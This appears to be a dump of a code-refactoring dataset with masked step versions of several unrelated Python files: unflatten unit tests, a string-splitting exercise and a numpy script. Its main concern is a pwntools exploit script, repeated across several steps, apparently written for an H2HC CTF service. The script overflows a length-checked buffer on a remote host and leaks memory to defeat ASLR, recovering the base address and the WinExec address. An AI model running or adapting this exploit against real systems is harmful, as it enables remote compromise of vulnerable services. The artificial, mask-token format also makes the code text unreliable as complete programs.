{'a': 1, 'b:0': 'c',\n 'b:1:0': 'd', 'b:1:1.e.f': -1, 'b:1:1.e.g': 'h'})\n\n\nclass UnflattenTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertDictEqual(unflatten({'a': 1, 'b[0]': 'c', 'b[1][0]': 'd',\n 'b[1][1][e][f]': -1, 'b[1][1][e][g]': 'h'}), {'a': 1, 'b': ['c',\n ['d', {'e': {'f': -1, 'g': 'h'}}]]})\n\n def test_dot_colon(self):\n self.assertDictEqual(unflatten({'a': 1, 'b:0': 'c', 'b:1:0': 'd',\n 'b:1:1.e.f': -1, 'b:1:1.e.g': 'h'}, split=dot_colon_split), {\n 'a': 1, 'b': ['c', ['d', {'e': {'f': -1, 'g': 'h'}}]]})\n\n\nclass DotColonJoinTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertSequenceEqual(dot_colon_join(('a',)), 'a')\n self.assertSequenceEqual(dot_colon_join(('b', 0)), 'b:0')\n self.assertSequenceEqual(dot_colon_join(('b', 1)), 'b:1')\n self.assertSequenceEqual(dot_colon_join(('b', 2, 'e')), 'b:2.e')\n self.assertSequenceEqual(dot_colon_join(('b', 2, 'f')), 'b:2.f')\n\n\nclass DotColonSplitTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertTupleEqual(dot_colon_split('a'), ('a',))\n self.assertTupleEqual(dot_colon_split('b:0'), ('b', 0))\n self.assertTupleEqual(dot_colon_split('b:1'), ('b', 1))\n self.assertTupleEqual(dot_colon_split('b:2.e'), ('b', 2, 'e'))\n self.assertTupleEqual(dot_colon_split('b:2.f'), ('b', 2, 'f'))\n",
"step-5": "import unittest\n\nfrom unflatten import _path_tuples_with_values_to_dict_tree, dot_colon_join, dot_colon_split\nfrom unflatten import _recognize_lists\nfrom unflatten import _tree_to_path_tuples_with_values\nfrom unflatten import brackets_join\nfrom unflatten import flatten\nfrom unflatten import unflatten\n\n\nclass BracketsReduceTestCase(unittest.TestCase):\n def test_one_element(self):\n self.assertEqual(brackets_join(['aa']), 'aa')\n\n def test_simple(self):\n self.assertEqual(brackets_join(['aa', 1, 'bb', 2]), 'aa[1][bb][2]')\n\n\nclass TreeToPathTuplesWithValuesTestCase(unittest.TestCase):\n def test_simple(self):\n self.assertSequenceEqual(\n list(_tree_to_path_tuples_with_values(\n {'a': ['b',\n {'e': 1}]})),\n [(('a', 0), 'b'),\n (('a', 1, 'e'), 1)])\n\n\nclass PathTuplesWithValuesToDictTreeTestCase(unittest.TestCase):\n def test_simple(self):\n self.assertDictEqual(\n _path_tuples_with_values_to_dict_tree(\n [(('a', 0), 'b'),\n (('a', 1, 'e'), 1)]),\n {'a': {0: 'b',\n 1: {'e': 1}}})\n\n\nclass RecognizeListsTestCase(unittest.TestCase):\n def test_simple(self):\n self.assertListEqual(\n _recognize_lists(\n {0: 'a',\n 1: {'b': -1,\n 'c': {0: 'd',\n 1: -2}}}),\n ['a',\n {'b': -1,\n 'c': ['d',\n -2]}])\n\n def test_again(self):\n self.assertDictEqual(\n unflatten(\n {'a': 1,\n 'b': {0: 'c',\n 1: {0: 'd',\n 1: {'e': {'f': -1,\n 'g': 'h'}}}}}),\n {'a': 1,\n 'b': ['c',\n ['d',\n {'e': {'f': -1,\n 'g': 'h'}}]]})\n\n\nclass FlattenTestCase(unittest.TestCase):\n def test_simple(self):\n self.assertDictEqual(\n flatten(\n {'a': 1,\n 'b': ['c',\n ['d',\n {'e': {'f': -1,\n 'g': 'h'}}]]}),\n {'a': 1,\n 'b[0]': 'c',\n 'b[1][0]': 'd',\n 'b[1][1][e][f]': -1,\n 'b[1][1][e][g]': 'h'})\n\n def test_dot_colon(self):\n self.assertDictEqual(\n flatten(\n {'a': 1,\n 'b': ['c',\n ['d',\n {'e': {'f': -1,\n 'g': 'h'}}]]},\n join=dot_colon_join),\n {'a': 1,\n 'b:0': 'c',\n 'b:1:0': 'd',\n 'b:1:1.e.f': -1,\n 'b:1:1.e.g': 'h'})\n\n\nclass UnflattenTestCase(unittest.TestCase):\n def test_simple(self):\n self.assertDictEqual(\n unflatten(\n {'a': 1,\n 'b[0]': 'c',\n 'b[1][0]': 'd',\n 'b[1][1][e][f]': -1,\n 'b[1][1][e][g]': 'h'}),\n {'a': 1,\n 'b': ['c',\n ['d',\n {'e': {'f': -1,\n 'g': 'h'}}]]})\n\n def test_dot_colon(self):\n self.assertDictEqual(\n unflatten(\n {'a': 1,\n 'b:0': 'c',\n 'b:1:0': 'd',\n 'b:1:1.e.f': -1,\n 'b:1:1.e.g': 'h'},\n split=dot_colon_split),\n {'a': 1,\n 'b': ['c',\n ['d',\n {'e': {'f': -1,\n 'g': 'h'}}]]})\n\n\nclass DotColonJoinTestCase(unittest.TestCase):\n def test_simple(self):\n self.assertSequenceEqual(dot_colon_join(('a',)), 'a')\n self.assertSequenceEqual(dot_colon_join(('b', 0)), 'b:0')\n self.assertSequenceEqual(dot_colon_join(('b', 1)), 'b:1')\n self.assertSequenceEqual(dot_colon_join(('b', 2, 'e')), 'b:2.e')\n self.assertSequenceEqual(dot_colon_join(('b', 2, 'f')), 'b:2.f')\n\n\nclass DotColonSplitTestCase(unittest.TestCase):\n def test_simple(self):\n self.assertTupleEqual(dot_colon_split('a'), ('a',))\n self.assertTupleEqual(dot_colon_split('b:0'), ('b', 0))\n self.assertTupleEqual(dot_colon_split('b:1'), ('b', 1))\n self.assertTupleEqual(dot_colon_split('b:2.e'), ('b', 2, 'e'))\n self.assertTupleEqual(dot_colon_split('b:2.f'), ('b', 2, 'f'))\n",
"step-ids": [
13,
17,
20,
21,
22
]
}
|
[
13,
17,
20,
21,
22
] |
def merge_the_tools(string, k):
if(len(string)%k != 0):
exit()
else:
L = []
for i in range(0, len(string), k):
L.append(''.join(list(dict.fromkeys(string[i:i+k]))))
print('\n'.join(L))
if __name__ == '__main__':
string, k = input(), int(input())
merge_the_tools(string, k)
# S, N = input(), int(input())
# for part in zip(*[iter(S)] * N):
# asterisk unpacks a list. Example: print(*[1,2,3,4]) = print(1,2,3,4)
# [iter(s)]*n makes a list of n times the same iterator for s.
# Example: [[iter(s)]*3] = ([iter(s), iter(s), iter(s)])
# if s = 'abcdefghi', then zip(*[iter(s)]*3) will have the following effect:
# a,b,c,d,e,f,g,h,i a,b,c,d,e,f,g,h,i a,b,c,d,e,f,g,h,i
# ^ ^ ^
# ^ ^ ^
# ^ ^ ^
# d = dict()
# print(''.join([ d.setdefault(c, c) for c in part if c not in d ]))
|
normal
|
{
"blob_id": "0004e90622f8b13ec7ce0c1f49e8c8df7ea07269",
"index": 7098,
"step-1": "<mask token>\n",
"step-2": "def merge_the_tools(string, k):\n if len(string) % k != 0:\n exit()\n else:\n L = []\n for i in range(0, len(string), k):\n L.append(''.join(list(dict.fromkeys(string[i:i + k]))))\n print('\\n'.join(L))\n\n\n<mask token>\n",
"step-3": "def merge_the_tools(string, k):\n if len(string) % k != 0:\n exit()\n else:\n L = []\n for i in range(0, len(string), k):\n L.append(''.join(list(dict.fromkeys(string[i:i + k]))))\n print('\\n'.join(L))\n\n\nif __name__ == '__main__':\n string, k = input(), int(input())\n merge_the_tools(string, k)\n",
"step-4": "def merge_the_tools(string, k):\n if(len(string)%k != 0):\n exit()\n else:\n L = []\n for i in range(0, len(string), k):\n L.append(''.join(list(dict.fromkeys(string[i:i+k]))))\n print('\\n'.join(L))\n\nif __name__ == '__main__':\n\n string, k = input(), int(input())\n merge_the_tools(string, k)\n\n\n# S, N = input(), int(input())\n# for part in zip(*[iter(S)] * N):\n# asterisk unpacks a list. Example: print(*[1,2,3,4]) = print(1,2,3,4)\n# [iter(s)]*n makes a list of n times the same iterator for s.\n# Example: [[iter(s)]*3] = ([iter(s), iter(s), iter(s)])\n# if s = 'abcdefghi', then zip(*[iter(s)]*3) will have the following effect:\n# a,b,c,d,e,f,g,h,i a,b,c,d,e,f,g,h,i a,b,c,d,e,f,g,h,i\n# ^ ^ ^\n# ^ ^ ^\n# ^ ^ ^\n# d = dict()\n# print(''.join([ d.setdefault(c, c) for c in part if c not in d ]))\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
context(arch='amd64', os='windows', log_level='debug')
<|reserved_special_token_0|>
log.info('Enviando estágio 1')
<|reserved_special_token_0|>
payload1 += 'ÿ\x00\x00\x00'
payload1 += 'A' * 255
payload1 += '\n'
<|reserved_special_token_0|>
p.send(payload1)
p.recv(4096)
p.close()
log.info('Enviando estágio 2')
<|reserved_special_token_0|>
payload2 += 'ÿ\x00\x00\x00'
payload2 += 'A' * 256
payload2 += '\x04\t\x00\x00'
<|reserved_special_token_0|>
p1.send(payload2)
p1.recvuntil('H2HC19 message:')
p1.recv(269)
<|reserved_special_token_0|>
log.info('Local leak : %s' % hex(leak_local_addr))
log.info('App Base Addr : %s' % hex(base_addr))
p1.recv(2032)
<|reserved_special_token_0|>
p1.recv(4096)
<|reserved_special_token_0|>
log.info('WinExec addr leak : %s' % hex(leak))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
context(arch='amd64', os='windows', log_level='debug')
host = '192.168.255.201'
port = 54345
log.info('Enviando estágio 1')
payload1 = 'H2HC'
payload1 += 'ÿ\x00\x00\x00'
payload1 += 'A' * 255
payload1 += '\n'
p = remote(host, port)
p.send(payload1)
p.recv(4096)
p.close()
log.info('Enviando estágio 2')
payload2 = 'H2HC'
payload2 += 'ÿ\x00\x00\x00'
payload2 += 'A' * 256
payload2 += '\x04\t\x00\x00'
p1 = remote(host, port)
p1.send(payload2)
p1.recvuntil('H2HC19 message:')
p1.recv(269)
ld1 = p1.recv(8)
leak_local_addr = u64(ld1.ljust(8, '\x00'))
base_addr = leak_local_addr & 18446744073709486080
log.info('Local leak : %s' % hex(leak_local_addr))
log.info('App Base Addr : %s' % hex(base_addr))
p1.recv(2032)
lead_data = p1.recv(8)
p1.recv(4096)
leak = u64(lead_data.ljust(8, '\x00'))
log.info('WinExec addr leak : %s' % hex(leak))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from pwn import *
import os
context(arch='amd64', os='windows', log_level='debug')
host = '192.168.255.201'
port = 54345
log.info('Enviando estágio 1')
payload1 = 'H2HC'
payload1 += 'ÿ\x00\x00\x00'
payload1 += 'A' * 255
payload1 += '\n'
p = remote(host, port)
p.send(payload1)
p.recv(4096)
p.close()
log.info('Enviando estágio 2')
payload2 = 'H2HC'
payload2 += 'ÿ\x00\x00\x00'
payload2 += 'A' * 256
payload2 += '\x04\t\x00\x00'
p1 = remote(host, port)
p1.send(payload2)
p1.recvuntil('H2HC19 message:')
p1.recv(269)
ld1 = p1.recv(8)
leak_local_addr = u64(ld1.ljust(8, '\x00'))
base_addr = leak_local_addr & 18446744073709486080
log.info('Local leak : %s' % hex(leak_local_addr))
log.info('App Base Addr : %s' % hex(base_addr))
p1.recv(2032)
lead_data = p1.recv(8)
p1.recv(4096)
leak = u64(lead_data.ljust(8, '\x00'))
log.info('WinExec addr leak : %s' % hex(leak))
<|reserved_special_token_1|>
#!/usr/bin/python
# -*- coding: utf-8 -*-
'''
Aplicação H2HC criado para CTF
Exploit criado por M4v3r1ck (helvio_junior[at]hotmail[dot]com)
'''
from pwn import *
import os
context(arch='amd64', os='windows', log_level='debug')
host= "192.168.255.201"
port = 54345
# Estágio 1
log.info("Enviando estágio 1")
payload1 = "H2HC" #cookie
payload1 += "\xff\x00\x00\x00" #size to trigger the vul
payload1 += "\x41" * 0xff
payload1 += "\n"
p = remote(host, port)
p.send(payload1)
p.recv(4096)
p.close()
# Estágio 2
log.info("Enviando estágio 2")
payload2 = "H2HC"
payload2 += "\xff\x00\x00\x00"
payload2 += "A" * 0x100
payload2 += "\x04\x09\x00\x00"
p1 = remote(host, port)
p1.send(payload2)
p1.recvuntil("H2HC19 message:")
#Leak de um endereço no próprio fluxo de execução da aplicação (Sessão .text)
p1.recv(0x10d)
ld1 = p1.recv(8)
leak_local_addr = u64(ld1.ljust(8, "\x00"))
base_addr = leak_local_addr & 0xffffffffffff0000
log.info("Local leak : %s" % hex(leak_local_addr))
log.info("App Base Addr : %s" % hex(base_addr))
# Leak do endereço da função WinExec
p1.recv(0x7f0) #offset entre a posição zero até o 90 f0 7e 0a fa 7f
lead_data = p1.recv(8)
p1.recv(4096)
leak = u64(lead_data.ljust(8, "\x00"))
log.info("WinExec addr leak : %s" % hex(leak))
|
flexible
|
{
"blob_id": "4fff64a62776a9d1b06cc11d5e55fc00f6787338",
"index": 8128,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ncontext(arch='amd64', os='windows', log_level='debug')\n<mask token>\nlog.info('Enviando estágio 1')\n<mask token>\npayload1 += 'ÿ\\x00\\x00\\x00'\npayload1 += 'A' * 255\npayload1 += '\\n'\n<mask token>\np.send(payload1)\np.recv(4096)\np.close()\nlog.info('Enviando estágio 2')\n<mask token>\npayload2 += 'ÿ\\x00\\x00\\x00'\npayload2 += 'A' * 256\npayload2 += '\\x04\\t\\x00\\x00'\n<mask token>\np1.send(payload2)\np1.recvuntil('H2HC19 message:')\np1.recv(269)\n<mask token>\nlog.info('Local leak : %s' % hex(leak_local_addr))\nlog.info('App Base Addr : %s' % hex(base_addr))\np1.recv(2032)\n<mask token>\np1.recv(4096)\n<mask token>\nlog.info('WinExec addr leak : %s' % hex(leak))\n",
"step-3": "<mask token>\ncontext(arch='amd64', os='windows', log_level='debug')\nhost = '192.168.255.201'\nport = 54345\nlog.info('Enviando estágio 1')\npayload1 = 'H2HC'\npayload1 += 'ÿ\\x00\\x00\\x00'\npayload1 += 'A' * 255\npayload1 += '\\n'\np = remote(host, port)\np.send(payload1)\np.recv(4096)\np.close()\nlog.info('Enviando estágio 2')\npayload2 = 'H2HC'\npayload2 += 'ÿ\\x00\\x00\\x00'\npayload2 += 'A' * 256\npayload2 += '\\x04\\t\\x00\\x00'\np1 = remote(host, port)\np1.send(payload2)\np1.recvuntil('H2HC19 message:')\np1.recv(269)\nld1 = p1.recv(8)\nleak_local_addr = u64(ld1.ljust(8, '\\x00'))\nbase_addr = leak_local_addr & 18446744073709486080\nlog.info('Local leak : %s' % hex(leak_local_addr))\nlog.info('App Base Addr : %s' % hex(base_addr))\np1.recv(2032)\nlead_data = p1.recv(8)\np1.recv(4096)\nleak = u64(lead_data.ljust(8, '\\x00'))\nlog.info('WinExec addr leak : %s' % hex(leak))\n",
"step-4": "<mask token>\nfrom pwn import *\nimport os\ncontext(arch='amd64', os='windows', log_level='debug')\nhost = '192.168.255.201'\nport = 54345\nlog.info('Enviando estágio 1')\npayload1 = 'H2HC'\npayload1 += 'ÿ\\x00\\x00\\x00'\npayload1 += 'A' * 255\npayload1 += '\\n'\np = remote(host, port)\np.send(payload1)\np.recv(4096)\np.close()\nlog.info('Enviando estágio 2')\npayload2 = 'H2HC'\npayload2 += 'ÿ\\x00\\x00\\x00'\npayload2 += 'A' * 256\npayload2 += '\\x04\\t\\x00\\x00'\np1 = remote(host, port)\np1.send(payload2)\np1.recvuntil('H2HC19 message:')\np1.recv(269)\nld1 = p1.recv(8)\nleak_local_addr = u64(ld1.ljust(8, '\\x00'))\nbase_addr = leak_local_addr & 18446744073709486080\nlog.info('Local leak : %s' % hex(leak_local_addr))\nlog.info('App Base Addr : %s' % hex(base_addr))\np1.recv(2032)\nlead_data = p1.recv(8)\np1.recv(4096)\nleak = u64(lead_data.ljust(8, '\\x00'))\nlog.info('WinExec addr leak : %s' % hex(leak))\n",
"step-5": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n'''\nAplicação H2HC criado para CTF\nExploit criado por M4v3r1ck (helvio_junior[at]hotmail[dot]com)\n'''\n\nfrom pwn import *\nimport os\n \ncontext(arch='amd64', os='windows', log_level='debug')\n\nhost= \"192.168.255.201\"\nport = 54345\n\n# Estágio 1\nlog.info(\"Enviando estágio 1\")\npayload1 = \"H2HC\" #cookie \npayload1 += \"\\xff\\x00\\x00\\x00\" #size to trigger the vul\npayload1 += \"\\x41\" * 0xff\npayload1 += \"\\n\"\n\np = remote(host, port)\np.send(payload1)\np.recv(4096)\np.close()\n\n# Estágio 2\nlog.info(\"Enviando estágio 2\")\npayload2 = \"H2HC\" \npayload2 += \"\\xff\\x00\\x00\\x00\" \npayload2 += \"A\" * 0x100\npayload2 += \"\\x04\\x09\\x00\\x00\" \n\n\np1 = remote(host, port)\np1.send(payload2)\n\np1.recvuntil(\"H2HC19 message:\")\n\n\n#Leak de um endereço no próprio fluxo de execução da aplicação (Sessão .text)\np1.recv(0x10d) \nld1 = p1.recv(8)\nleak_local_addr = u64(ld1.ljust(8, \"\\x00\"))\n\nbase_addr = leak_local_addr & 0xffffffffffff0000\n\nlog.info(\"Local leak : %s\" % hex(leak_local_addr))\nlog.info(\"App Base Addr : %s\" % hex(base_addr))\n\n# Leak do endereço da função WinExec\np1.recv(0x7f0) #offset entre a posição zero até o 90 f0 7e 0a fa 7f \nlead_data = p1.recv(8)\np1.recv(4096)\n\nleak = u64(lead_data.ljust(8, \"\\x00\"))\n\nlog.info(\"WinExec addr leak : %s\" % hex(leak))\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import numpy
d1 = numpy.array([1.,0.,0.])
d2 = numpy.array([0.,1.,0.])
d3 = numpy.array([0.,0.,1.])
s0 = numpy.array([0.,0.,1.])
m2 = numpy.array([1.,0.,0.])
print "x y zeta"
for x in xrange(-100, 101):
for y in xrange(-100, 101):
s = x*d1 + y*d2 + 100*d3
e1 = numpy.cross(s, s0)
e1 /= numpy.linalg.norm(e1)
zeta = abs(numpy.dot(e1, m2))
print x,y,zeta
|
normal
|
{
"blob_id": "3d16f2da03c067d410bec7bfe96d874322533d30",
"index": 6693,
"step-1": "import numpy\n\nd1 = numpy.array([1.,0.,0.])\nd2 = numpy.array([0.,1.,0.])\nd3 = numpy.array([0.,0.,1.])\ns0 = numpy.array([0.,0.,1.])\nm2 = numpy.array([1.,0.,0.])\n\nprint \"x y zeta\"\nfor x in xrange(-100, 101):\n for y in xrange(-100, 101):\n s = x*d1 + y*d2 + 100*d3\n e1 = numpy.cross(s, s0)\n e1 /= numpy.linalg.norm(e1)\n zeta = abs(numpy.dot(e1, m2))\n print x,y,zeta\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.